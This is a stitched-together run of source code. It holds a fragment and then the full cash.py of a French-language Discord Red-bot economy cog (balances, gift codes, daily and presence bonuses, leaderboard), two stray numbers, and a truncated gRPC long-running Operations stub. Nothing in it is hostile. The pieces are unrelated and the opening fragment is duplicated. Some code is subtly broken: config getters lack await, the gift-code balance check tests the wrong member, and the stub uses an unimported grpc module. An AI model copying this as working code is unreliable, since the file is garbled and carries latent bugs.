mettre affiche le solde actuel du membre""" acc = await self.get_account(user) curr = await self.get_currency(user.guild) if value: try: solde = await self.set_balance(user, value) await ctx.send(f"**Succès** • Le solde de {user.mention} est désormais de **{solde}** {curr}") except ValueError: await ctx.send("**Erreur** • Le solde d'un membre ne peut être négatif") else: await ctx.send(f"**Info** • Le solde de {str(user)} est de **{humanize_number(acc.balance)}** {curr}") @_bank_set.command(name="resetuser") async def _bank_reset_account(self, ctx, user: discord.Member): """Reset les données bancaires d'un membre (cache compris)""" await self.config.member(user).clear() await ctx.send(f"**Succès** • Le compte de {user.mention} a été réinitialisé") @_bank_set.command(name="resetcache") async def _bank_reset_account_cache(self, ctx, user: discord.Member): """Reset seulement les données du cache du compte bancaire du membre Cela réinitialise les délais des bonus""" await self.config.member(user).config.clear_raw("cache_daily_bonus") await self.config.member(user).config.clear_raw("cache_presence_bonus") await ctx.send(f"**Succès** • Le cache du compte de {user.mention} a été réinitialisé") # Bonus de présence ---------------------v async def manage_presence_bonus(self, member: discord.Member) -> Union[int, bool]: """Gère l'ajout auto. des bonus de présence sur les serveurs ayant activé l'option Renvoie le nouveau solde du membre s'il est modifié, sinon False""" if member.bot: raise UnauthorizedMember("Un bot ne peut pas toucher les bonus de présence") guild = member.guild conf = await self.config.guild(guild).all() if conf["presence_bonus"]: acc = await self.get_account(member) if acc.config["cache_presence_bonus"] + conf["presence_delay"] < time.time(): await self.config.member(member).config.set_raw("cache_presence_bonus", value=time.time()) return await self.deposit_credits(member, conf["presence_bonus"]) return False @commands.Cog.listener() async def on_message(self, message): if message.guild: if not message.author.bot: await self.manage_presence_bonus(message.author) @commands.Cog.listener() async def on_reaction_add(self, reaction, author): if reaction.message.guild: if not author.bot: await self.manage_presence_bonus(author) async def red_delete_data_for_user( self, *, requester: Literal["discord", "owner", "user", "user_strict"], user_id: int ): await self.config.user_from_id(user_id).clear() all_members = await self.config.all_members() async for guild_id, guild_data in AsyncIter(all_members.items(), steps=100): if user_id in guild_data: await self.config.member_from_ids(guild_id, user_id).clear()
cash/cash.py
import asyncio import logging import random import re import string import time from copy import copy from datetime import datetime, timedelta import discord from discord.errors import HTTPException from typing import Union, List, Tuple, Literal from redbot.core import Config, commands, checks from redbot.core.utils import AsyncIter from redbot.core.utils.menus import start_adding_reactions from redbot.core.utils.chat_formatting import box, humanize_number, humanize_timedelta from tabulate import tabulate logger = logging.getLogger("red.AwsmCogs.cash") class CashError(Exception): """Classe de base pour les erreurs Cash""" class BalanceTooHigh(CashError): """Soulevée lorsque le balance dépasse le seuil fixé""" class UnauthorizedMember(CashError): """Soulevée lorsqu'un membre n'est pas autorisé à réaliser une action""" class UserNotFound(CashError): """Soulevée lorsqu'un membre n'est pas retrouvé sur le serveur""" class UnknownGiftCode(CashError): """Soulevée lorsque le code cadeau donné n'existe pas""" class GiftCodeExpired(CashError): """Soulevée lorsqu'un code cadeau vient d'expirer""" def _invalid_amount(value: int) -> bool: return value < 0 class Account: def __init__(self, user: discord.Member, balance: int, logs: list, config: dict): self.user = user self.guild = user.guild self.balance = balance self.logs = logs self.config = config def __str__(self): return self.user.mention def __int__(self): return self.balance class Log: def __init__(self, user: discord.Member, text: str, timestamp: int, delta: int): self.user = user self.guild = user.guild self.text = text self.timestamp = timestamp self.delta = delta def __str__(self): return self.text def __int__(self): return self.timestamp class GiftCode: def __init__(self, code: str, author: discord.Member, expire: int, value: int): self.code = code self.author, self.guild = author, author.guild self.expire = expire self.value = value def __str__(self): return self.code def __int__(self): return self.value class Cash(commands.Cog): """Economie virtuelle et jeux utilisant celle-ci""" def __init__(self, bot): super().__init__() self.bot = bot self.config = Config.get_conf(self, identifier=736144321857978388, force_registration=True) default_member = {"balance": 0, "logs": [], "config": {"day_delta": [None, 0], "cache_daily_bonus": '', "cache_presence_bonus": 0} } default_guild = {"currency": "Ꞥ", "daily_bonus": 100, "presence_bonus": 0, "presence_delay": 600, "gift_codes": {}} default_global = {"max_balance": 10**9, "max_logs_length": 3} self.config.register_member(**default_member) self.config.register_guild(**default_guild) self.config.register_global(**default_global) async def get_currency(self, guild: discord.Guild) -> str: """Obtenir le symbole de la monnaie du serveur""" return await self.config.guild(guild).currency() async def set_currency(self, guild: discord.Guild, symbol: str) -> str: """Modifie le symbole de la monnaie du serveur Renvoie le nouveau symbole attribué""" if not isinstance(symbol, str): raise TypeError("Type du symbole invalide, {} != str".format(type(symbol))) if len(symbol) > 5: raise ValueError("Le symbole de la monnaie ne peut pas faire plus de 5 caractères de long") await self.config.guild(guild).currency.set(symbol) return symbol async def get_account(self, member: discord.Member) -> Account: """Obtenir l'objet Account du membre demandé""" userdata = await self.config.member(member).all() return Account(member, **userdata) async def get_balance(self, member: discord.Member) -> int: """Renvoie la valeur actuelle du solde d'un membre""" account = await self.get_account(member) return account.balance async def enough_balance(self, member: discord.Member, cost: int) -> bool: """Vérifie si le membre possède assez de fonds pour une dépense""" if not isinstance(cost, int): raise TypeError("Type de la dépense invalide, {} != int".format(type(cost))) if _invalid_amount(cost): return False return await self.get_balance(member) >= cost async def set_balance(self, member: discord.Member, value: int) -> int: """Modifier le solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if value < 0: raise ValueError("Le solde ne peut être négatif") max_balance = await self.config.max_balance() if value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits") oldvalue = await self.config.member(member).balance() await self.edit_delta(member, value - oldvalue) await self.config.member(member).balance.set(value) return value async def deposit_credits(self, member: discord.Member, value: int) -> int: """Ajouter des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de dépôt invalide, {value} < 0") current = await self.get_balance(member) return await self.set_balance(member, current + value) async def remove_credits(self, member: discord.Member, value: int) -> int: """Retirer des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type de retrait invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de retrait invalide, {value} < 0") current = await self.get_balance(member) if value > current: raise ValueError(f"Fonds insuffisants, {value} > {current}") return await self.set_balance(member, current - value) async def transfert_credits(self, from_: discord.Member, to_: discord.Member, value: int) -> Tuple[Account, Account]: """Transfère des crédits d'un membre à un autre Renvoie un tuple contenant les comptes des deux membres""" if not isinstance(value, int): raise TypeError("Type du transfert invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur du transfert invalide, {value} < 0") max_balance = await self.config.max_balance() if await self.get_balance(to_) + value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits lors d'une " f"transaction") await self.remove_credits(from_, value) await self.deposit_credits(to_, value) return await self.get_account(from_), await self.get_account(to_) async def gen_gcode(self, guild: discord.Guild) -> str: """Génère un code unique au format $XX-YYY pour les codes cadeaux Cap. max. théorique = 52 521 875 codes uniques""" current_codes = await self.config.guild(guild).gift_codes() r = lambda long: ''.join(random.choices(string.ascii_uppercase + string.digits, k=long)) code = f"${r(2)}-{r(3)}" while code in current_codes: code = f"${r(2)}-{r(3)}" return code async def new_gift_code(self, from_: discord.Member, value: int, timestamp: int) -> str: """Génère un nouveau code cadeau contenant une certaine somme Le code est valide seulement sur le serveur du membre ayant généré le code Renvoie le code généré""" if not isinstance(value, int): raise TypeError("Type de valeur invalide, {} != int".format(type(value))) if not isinstance(timestamp, int): raise TypeError("Type du timestamp d'expiration invalide, {} != int".format(type(timestamp))) if value < 0: raise ValueError("La valeur de crédits contenus dans le code doit être positif") if timestamp < 0: raise ValueError("La valeur de l'expiration doit être positive ou nulle") guild = from_.guild code = await self.gen_gcode(guild) current = await self.config.guild(guild).gift_codes() current[code] = {"value": value, "expire": timestamp, "author": from_.id} await self.config.guild(guild).gift_codes.set(current) return code async def fetch_gift_code(self, code: str, ref_user: discord.Member = None) -> Union[GiftCode, None]: """Retrouve automatiquement le serveur d'un code et renvoie celui-ci si trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Type du code invalide, {} != str".format(type(code))) all_guilds = await self.config.all_guilds() for guildid in all_guilds: if code in all_guilds[guildid]["gift_codes"]: guild = self.bot.get_guild(guildid) if guild: if ref_user is not None and ref_user in guild.members: return await self.get_gift_code(guild, code) else: return await self.get_gift_code(guild, code) return None async def get_gift_code(self, guild: discord.Guild, code: str) -> Union[GiftCode, None]: """Renvoie un objet *GiftCode* s'il est trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Le code est invalide, {} != str".format(type(code))) codes = await self.config.guild(guild).gift_codes() if code in codes: c = codes[code] if time.time() > c["expire"]: del codes[code] await self.config.guild(guild).gift_codes.set(codes) raise GiftCodeExpired(f"Le code cadeau {code} vient d'expirer") user = guild.get_member(c["author"]) if not user: raise UserNotFound(f"Le membre avec l'ID {c['author']} est introuvable") return GiftCode(author=user, value=c["value"], code=code, expire=c["expire"]) return None async def use_gift_code(self, user: discord.Member, code: str) -> Union[int, bool]: """Utilise un code et renvoie la valeur qu'il contenait si le membre générateur possède suffisamment de fonds, sinon renvoie False""" gift = await self.get_gift_code(user.guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={user.guild.id}") if not await self.enough_balance(user, gift.value): return False await self.transfert_credits(gift.author, user, gift.value) return await self.remove_gift_code(user.guild, code) async def remove_gift_code(self, guild: discord.Guild, code: str) -> int: """Supprime le code et renvoie la valeur contenue dans celui-ci""" try: gift = await self.get_gift_code(guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={guild.id}") await self.config.guild(guild).gift_codes.clear_raw(code) return gift.value except: raise ValueError(f"Le code cadeau {code} n'est pas valide") async def get_delta(self, member: discord.Member, yield_date: bool = False) -> Union[int, list]: """Renvoie la valeur et date du delta total des opérations du membre""" acc = await self.get_account(member) delta = acc.config["day_delta"] return delta[1] if not yield_date else delta async def edit_delta(self, member: discord.Member, value: int) -> int: """Modifie la valeur du delta des opérations du jour Renvoie la nouvelle valeur du delta""" if not isinstance(value, int): raise TypeError("Type de la valeur du delta invalide, {} != int".format(type(value))) date, delta = await self.get_delta(member, True) today = datetime.now().strftime("%Y.%m.%d") if date != today: delta = 0 await self.config.member(member).config.set_raw("day_delta", value=[today, delta + value]) return delta + value async def get_log(self, member: discord.Member, timestamp: int) -> Union[Log, None]: """Renvoie le (1er) log du membre correspondant au timestamp fourni si trouvé, sinon None""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp invalide, {} != int".format(type(timestamp))) acc = await self.get_account(member) for log in acc.logs: if log["timestamp"] == timestamp: return Log(**log) return None async def get_member_logs(self, member: discord.Member) -> Union[List[Log], list]: """Renvoie tous les logs (sous forme d'objets Log) d'un membre Renvoie une liste vide si aucun log n'est présent""" acc = await self.get_account(member) all_logs = [] if acc.logs: for log in acc.logs: all_logs.append(Log(member, **log)) return all_logs async def add_log(self, member: discord.Member, text: str, delta: int) -> list: """Ajoute un log au membre visé Renvoie le nouvel état des logs""" if not isinstance(text, str): raise TypeError("Type du contenu du log invalide, {} != str".format(type(text))) if not isinstance(delta, int): raise TypeError("Type de somme du log invalide, {} != int".format(type(delta))) added = {"text": text, "timestamp": int(time.time()), "delta": delta} acc = await self.get_account(member) logs = acc.logs max_logs_length = await self.config.max_logs_length() if len(logs) >= max_logs_length: logs = logs[-(max_logs_length - 1):] logs.append(added) await self.config.member(member).logs.set(logs) return logs async def delete_log(self, member: discord.Member, timestamp: int) -> list: """Retire un log (ou plusieurs s'ils ont un timestamp identique) au membre visé Typiquement optionnel, les logs étant remplacés au fur et à mesure des ajouts Renvoie le nouvel état des logs""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp du log invalide, {} != int".format(type(timestamp))) if not await self.get_log(member, timestamp): raise ValueError(f"Log avec le timestamp {timestamp} pour USERID={member.id} introuvable") acc = await self.get_account(member) logs = acc.logs new = copy(logs) for log in logs: if log["timestamp"] == timestamp: new.remove(log) await self.config.member(member).logs.set(new) return new async def wipe_logs(self, member: discord.Member) -> None: """Supprime tous les logs d'un membre""" await self.config.member(member).clear_raw("logs") async def wipe_guild(self, guild: discord.Guild) -> None: """Supprime les données bancaires des membres d'un serveur""" await self.config.clear_all_members(guild) async def wipe_account(self, member: discord.Member) -> None: """Supprime les données bancaires d'un membre""" await self.config.member(member).clear() async def raw_delete_account(self, user_id: int, guild: discord.Guild) -> None: """Supprime un compte bancaire par ID du membre""" await self.config.member_from_ids(guild.id, user_id).clear() async def get_max_balance(self) -> int: """Renvoie la valeur maximale que peut atteindre un solde de membre (sur n'importe quel serveur)""" return self.config.max_balance() async def set_max_balance(self, value: int) -> None: """Modifie la valeur maximale qu'un solde de membre peut atteindre""" if not isinstance(value, int): raise TypeError("Type de la valeur maximale invalide, {} != int".format(type(value))) if value <= 0: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_balance.set(value) async def get_max_logs_length(self) -> int: """Renvoie le nombre maximal de logs pouvant être stockés dans les données bancaires d'un membre""" return self.config.max_logs_length() async def set_max_logs_length(self, length: int) -> None: """Modifie le nombre de logs stockés pour un membre""" if not isinstance(length, int): raise TypeError("Type de la longueur maximale invalide, {} != int".format(type(length))) if length < 1: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_logs_length.set(length) async def get_guild_leaderboard(self, guild: discord.Guild, cutoff: int = None) -> Union[list, List[Account]]: """Renvoie le top des membres les plus riches du serveur (liste d'objets Account) Renvoie une liste vide si aucun top n'est générable""" users = await self.config.all_members(guild) sorted_users = sorted(list(users.items()), key=lambda u: u[1]["balance"], reverse=True) top = [] for uid, acc in sorted_users: user = guild.get_member(uid) if user: top.append(Account(user, **acc)) return top[:cutoff] if cutoff else top async def get_leaderboard_position_for(self, member: discord.Member) -> int: """Renvoie la position du membre dans le classement de son serveur Renvoie la dernière place du classement si le membre n'est pas trouvé""" top = await self.get_guild_leaderboard(member.guild) for acc in top: if acc.user == member: return top.index(acc) + 1 return len(top) async def utils_parse_timedelta(self, time_string: str) -> timedelta: """Renvoie un objet *timedelta* à partir d'un str contenant des informations de durée (Xj Xh Xm Xs)""" if not isinstance(time_string, str): raise TypeError("Le texte à parser est invalide, {} != str".format(type(time_string))) regex = re.compile('^((?P<days>[\\.\\d]+?)j)? *((?P<hours>[\\.\\d]+?)h)? *((?P<minutes>[\\.\\d]+?)m)? *((?P<seconds>[\\.\\d]+?)s)? *$') sch = regex.match(time_string) if not sch: raise ValueError("Aucun timedelta n'a pu être déterminé des valeurs fournies") parsed = sch.groupdict() return timedelta(**{i: int(parsed[i]) for i in parsed if parsed[i]}) # Commandes -----------------------v @commands.group(name="bank", aliases=["b"], invoke_without_command=True) async def _bank_actions(self, ctx, user: discord.Member = None): """Commandes de gestion du compte bancaire virtuel *Cash*""" if ctx.invoked_subcommand is None: return await ctx.invoke(self.show_bank, user=user) @_bank_actions.command(name="show") @commands.guild_only() async def show_bank(self, ctx, user: discord.Member = None): """Afficher les infos de son compte""" user = user if user else ctx.message.author acc = await self.get_account(user) curr = await self.get_currency(ctx.guild) hum_balance = humanize_number(acc.balance) em = discord.Embed(color=user.color, timestamp=ctx.message.created_at) em.set_author(name="Compte de " + str(user), icon_url=user.avatar_url) em.add_field(name="💰 Solde", value=box(f"{hum_balance} {curr}")) delta = await self.get_delta(user) delta_emoji = "📉" if delta < 0 else "📈" em.add_field(name=f"{delta_emoji} Variation", value=box(f"{delta:+}")) top = await self.get_leaderboard_position_for(user) em.add_field(name="🏅 Position", value=box(f"#{top}")) logs = await self.get_member_logs(user) if logs: txt = "\n".join([f"{log.delta:+} · {log.text[:50]}" for log in logs][::-1]) em.add_field(name="📃 Historique", value=txt) await ctx.send(embed=em) @_bank_actions.command(name="give") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_give(self, ctx, receveur: discord.Member, somme: int): """Transférer de l'argent à un receveur tiers""" try: await self.transfert_credits(ctx.author, receveur, int(somme)) curr = await self.get_currency(ctx.guild) await ctx.send(f"**Transfert réalisé** • {receveur.mention} a reçu **{somme}** {curr}") except ValueError: return await ctx.send("**Impossible** • Vous ne pouvez pas transférer une somme nulle ou négative") except BalanceTooHigh: plaf = humanize_number(await self.config.max_balance()) return await ctx.send(f"**Limite atteinte** • {receveur.mention} ne peut pas recevoir cette somme car " f"il dépasserait le plafond fixé de {plaf}") await self.add_log(ctx.author, f"Transfert d'argent à {receveur.name}", -somme) await self.add_log(receveur, f"Reception d'argent de {ctx.author.name}", somme) @_bank_actions.command(name="gift") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_gift(self, ctx, somme: int, expire: str = "24h"): """Générer un code cadeau contenant des crédits (retrait différé) Le retrait de crédits sur le compte du membre générateur n'est pas immédiat et l'utilisation du code sera impossible en cas de manque de fonds Par défaut les codes expirent au bout de 24h, vous pouvez modifier cela avec le paramètre *<expire>* en utilisant le format `\"Xj Xh Xm Xs\"`""" user = ctx.author if somme < 1: return await ctx.send( "**Erreur** • La valeur doit être positive (sup. à 0)") try: tdelta = await self.utils_parse_timedelta(expire) except ValueError: return await ctx.send("**Erreur** • Le temps d'expiration n'est pas valide, utilisez le format `\"Xj Xh Xm Xs\"`") if await self.enough_balance(user, somme): timestamp = (datetime.now() + tdelta).timestamp() curr = await self.get_currency(ctx.guild) em = discord.Embed(title=f"**Nouveau code-cadeau** · {somme} {curr}", description="**En cours de génération...**") em.add_field(name="Information", value="Un membre peut utiliser ce code avec `b open`\n" "Vous serez débité de la valeur du code lors de son utilisation\n" "L'expiration du code rend impossible son utilisation, pour " "détruire le code avant sa date d'expiration utilisez-le vous-même.") em.set_footer(text="Ce code expirera dans {}".format(humanize_timedelta(timedelta=tdelta))) try: dm = await user.send(embed=em) except: return await ctx.send("**Erreur** • Je ne peux pas générer de code si vous ne me permettez pas de vous envoyer un MP") try: code = await self.new_gift_code(user, somme, int(timestamp)) await asyncio.sleep(1) em.description = box(code) em.colour = user.color await dm.edit(embed=em) except ValueError as e: await ctx.send( f"**Erreur** • La génération du code n'a pas pu se faire en raison d'un problème dans les valeurs fournies : `{e}`") em.description = box("Erreur dans la génération du code") await dm.edit(embed=em) else: await ctx.send( "**Impossible** • Même si le retrait n'est pas immédiat, vous devez avoir la somme sur votre compte préalablement à la génération d'un code") @_bank_actions.command(name="open") async def bank_open_gift(self, ctx, code: str): """Utiliser un code-cadeau et obtenir son contenu Les codes ne fonctionnent que sur le serveur où ils ont été générés""" code = code.upper().strip() try: if ctx.guild: gift = await self.get_gift_code(ctx.guild, code) else: gift = await self.fetch_gift_code(code) except ValueError: return await ctx.send("**Invalide** • Le code fourni est invalide, vérifiez-le et réessayez") except GiftCodeExpired: return await ctx.send("**Expiré** • Le code fourni a expiré, consultez le générateur du code pour en obtenir un nouveau") if gift: guild = gift.guild curr = await self.get_currency(guild) hum_value = humanize_number(gift.value) content = f"{hum_value} {curr}" em = discord.Embed(title=f"**Code-cadeau** · {code}", description="Voulez-vous échanger le code contre son contenu ?") em.add_field(name="Contenu", value=box(content)) em.set_footer(text="🎁 Accepter | ❌ Refuser") emojis = ["🎁", "❌"] msg = await ctx.send(embed=em) start_adding_reactions(msg, emojis) try: react, user = await self.bot.wait_for("reaction_add", check=lambda r, u: u == ctx.author and r.message.id == msg.id, timeout=20) except asyncio.TimeoutError: await msg.delete() return else: emoji = react.emoji await msg.delete() if emoji == "🎁": if await self.enough_balance(gift.author, gift.value): try: await self.use_gift_code(ctx.author, code) except Exception as e: logger.error(e, exc_info=True) return await ctx.send("Erreur de transfert de fonds : `{}`".format(str(e).replace('\"', ''))) await self.add_log(ctx.author, "Utilisation d'un code-cadeau", gift.value) await self.add_log(gift.author, "Débit du code cadeau utilisé", -gift.value) await ctx.send(f"**Utilisation réussie** • **{humanize_number(gift.value)}** {curr} ont été " f"transférés sur votre compte.") else: await ctx.send(f"**Fonds insuffisants** • L'auteur du code ({str(gift.author)}) n'a plus les " f"fonds suffisants pour assumer la valeur de ce code") else: await ctx.send(f"**Code invalide** • Le code est invalide ou celui-ci a peut-être expiré") @commands.command(name="bonus") @commands.guild_only() async def cash_bonus(self, ctx): """Recevoir son bonus quotidien de crédits""" author = ctx.author today = datetime.now().strftime("%Y.%m.%d") acc = await self.get_account(author) curr = await self.get_currency(ctx.guild) bonus = await self.config.guild(ctx.guild).daily_bonus() if bonus: if acc.config["cache_daily_bonus"] != today: await self.config.member(author).config.set_raw("cache_daily_bonus", value=today) new = await self.deposit_credits(author, bonus) await self.add_log(author, "Bonus quotidien récupéré", bonus) em = discord.Embed(color=author.color, description=f"**+{bonus}** {curr} ont été ajoutés à votre compte au titre du bonus quotidien.", timestamp=ctx.message.created_at) em.set_author(name=str(author), icon_url=author.avatar_url) em.set_footer(text=f"Vous avez désormais {new} {curr}") await ctx.send(embed=em) else: await ctx.send("**Déjà récupéré** • Revenez demain pour obtenir votre bonus !") else: await ctx.send("**Désactivé** • Ce serveur n'offre pas de bonus quotidien") @commands.command(name="leaderboard", aliases=["lb"]) @commands.guild_only() @commands.cooldown(1, 10, commands.BucketType.guild) async def display_leaderboard(self, ctx, top: int = 20): """Affiche le top des membres les plus riches du serveur Vous pouvez modifier la longueur du top en précisant le paramètre *<top>*""" lbd = await self.get_guild_leaderboard(ctx.guild, top) if lbd: tbl = [] for acc in lbd: tbl.append([str(acc.user), acc.balance]) em = discord.Embed(color=await self.bot.get_embed_color(ctx.channel), description="```" + tabulate(tbl, headers=["Membre", "Solde"]) + "```",) em.set_author(name=f"🏆 Leaderboard de {ctx.guild.name}", icon_url=ctx.guild.icon_url) try: await ctx.send(embed=em) except HTTPException: await ctx.send("**Erreur** • Le top est trop grand pour être affiché, utilisez une " "valeur de <top> plus réduite") else: await ctx.send("Il n'y a aucun top à afficher.") @commands.group(name="bankset", aliases=["bset"]) @checks.admin_or_permissions(manage_messages=True) async def _bank_set(self, ctx): """Commandes de modération de la banque""" @_bank_set.command(name="monnaie", aliases=["currency"]) async def _bank_currency(self, ctx, symbole: str): """Changer le symbole utilisé pour la monnaie sur le serveur""" try: await self.set_currency(ctx.guild, symbole) await ctx.send(f"**Changement réalisé** • Le nouveau symbole de la monnaie sera `{symbole}`") except ValueError: await ctx.send("**Erreur** • Vous ne pouvez pas utiliser une monnaie de plus de 5 caractères de long") @_bank_set.command(name="dailybonus") async def _bank_daily_bonus(self, ctx, somme: int): """Modifier le bonus quotidien octroyé aux membres Mettre 0 désactive le bonus quotidien""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).daily_bonus.set(somme) curr = await self.get_currency(guild) if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres auront le droit à {somme} {curr} par jour") else: await ctx.send("**Bonus désactivé** • Les membres ne pourront plus demander un bonus quotidien de crédits") else: await ctx.send("**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presbonus") async def _bank_presence_bonus(self, ctx, somme: int): """Modifier le bonus de présence octroyé aux membres parlant sur les salons (par unité de temps) Mettre 0 désactive ce bonus""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).presence_bonus.set(somme) curr = await self.get_currency(guild) delay = await self.config.guild(guild).presence_delay() if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres recevront {somme} {curr} toutes les {delay} secondes") else: await ctx.send( "**Bonus désactivé** • Les membres ne recevront plus de crédits lorsqu'ils discutent") else: await ctx.send( "**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presdelay") async def _bank_presence_delay(self, ctx, secondes: int = 600): """Modifier le délai en secondes entre deux bonus de présence (par def. 600s = 10m)""" guild = ctx.guild if secondes >= 60: await self.config.guild(guild).presence_delay.set(secondes) curr = await self.get_currency(guild) bonus = await self.config.guild(guild).presence_bonus() await ctx.send( f"**Délai modifié** • Les membres recevront {bonus} {curr} toutes les {secondes} secondes") else: await ctx.send( "**Invalide** • Le délai doit être supérieur à 60s") @_bank_set.command(name="edit") async def _bank_edit_account(self, ctx, user: discord.Member, value: int = None): """Modifie le solde d'un compte de membre Ne rien mettre affiche le solde actuel du membre""" acc = await self.get_account(user) curr = await self.get_currency(user.guild) if value: try: solde = await self.set_balance(user, value) await ctx.send(f"**Succès** • Le solde de {user.mention} est désormais de **{solde}** {curr}") except ValueError: await ctx.send("**Erreur** • Le solde d'un membre ne peut être négatif") else: await ctx.send(f"**Info** • Le solde de {str(user)} est de **{humanize_number(acc.balance)}** {curr}") @_bank_set.command(name="resetuser") async def _bank_reset_account(self, ctx, user: discord.Member): """Reset les données bancaires d'un membre (cache compris)""" await self.config.member(user).clear() await ctx.send(f"**Succès** • Le compte de {user.mention} a été réinitialisé") @_bank_set.command(name="resetcache") async def _bank_reset_account_cache(self, ctx, user: discord.Member): """Reset seulement les données du cache du compte bancaire du membre Cela réinitialise les délais des bonus""" await self.config.member(user).config.clear_raw("cache_daily_bonus") await self.config.member(user).config.clear_raw("cache_presence_bonus") await ctx.send(f"**Succès** • Le cache du compte de {user.mention} a été réinitialisé") # Bonus de présence ---------------------v async def manage_presence_bonus(self, member: discord.Member) -> Union[int, bool]: """Gère l'ajout auto. des bonus de présence sur les serveurs ayant activé l'option Renvoie le nouveau solde du membre s'il est modifié, sinon False""" if member.bot: raise UnauthorizedMember("Un bot ne peut pas toucher les bonus de présence") guild = member.guild conf = await self.config.guild(guild).all() if conf["presence_bonus"]: acc = await self.get_account(member) if acc.config["cache_presence_bonus"] + conf["presence_delay"] < time.time(): await self.config.member(member).config.set_raw("cache_presence_bonus", value=time.time()) return await self.deposit_credits(member, conf["presence_bonus"]) return False @commands.Cog.listener() async def on_message(self, message): if message.guild: if not message.author.bot: await self.manage_presence_bonus(message.author) @commands.Cog.listener() async def on_reaction_add(self, reaction, author): if reaction.message.guild: if not author.bot: await self.manage_presence_bonus(author) async def red_delete_data_for_user( self, *, requester: Literal["discord", "owner", "user", "user_strict"], user_id: int ): await self.config.user_from_id(user_id).clear() all_members = await self.config.all_members() async for guild_id, guild_data in AsyncIter(all_members.items(), steps=100): if user_id in guild_data: await self.config.member_from_ids(guild_id, user_id).clear()
0.655667
0.175009
from google.longrunning.operations_pb2 import ( CancelOperationRequest, DeleteOperationRequest, GetOperationRequest, ListOperationsRequest, ListOperationsResponse, Operation, google_dot_protobuf_dot_empty__pb2, ) from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities class OperationsStub(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.GetOperation = channel.unary_unary( '/google.longrunning.Operations/GetOperation', request_serializer=GetOperationRequest.SerializeToString, response_deserializer=Operation.FromString, ) self.ListOperations = channel.unary_unary( '/google.longrunning.Operations/ListOperations', request_serializer=ListOperationsRequest.SerializeToString, response_deserializer=ListOperationsResponse.FromString, ) self.CancelOperation = channel.unary_unary( '/google.longrunning.Operations/CancelOperation', request_serializer=CancelOperationRequest.SerializeToString, response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString, ) self.DeleteOperation = channel.unary_unary( '/google.longrunning.Operations/DeleteOperation', request_serializer=DeleteOperationRequest.SerializeToString, response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString, ) class OperationsServicer(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, context): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def ListOperations(self, request, context): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def CancelOperation(self, request, context): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteOperation(self, request, context): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_OperationsServicer_to_server(servicer, server): rpc_method_handlers = { 'GetOperation': grpc.unary_unary_rpc_method_handler( servicer.GetOperation, request_deserializer=GetOperationRequest.FromString, response_serializer=Operation.SerializeToString, ), 'ListOperations': grpc.unary_unary_rpc_method_handler( servicer.ListOperations, request_deserializer=ListOperationsRequest.FromString, response_serializer=ListOperationsResponse.SerializeToString, ), 'CancelOperation': 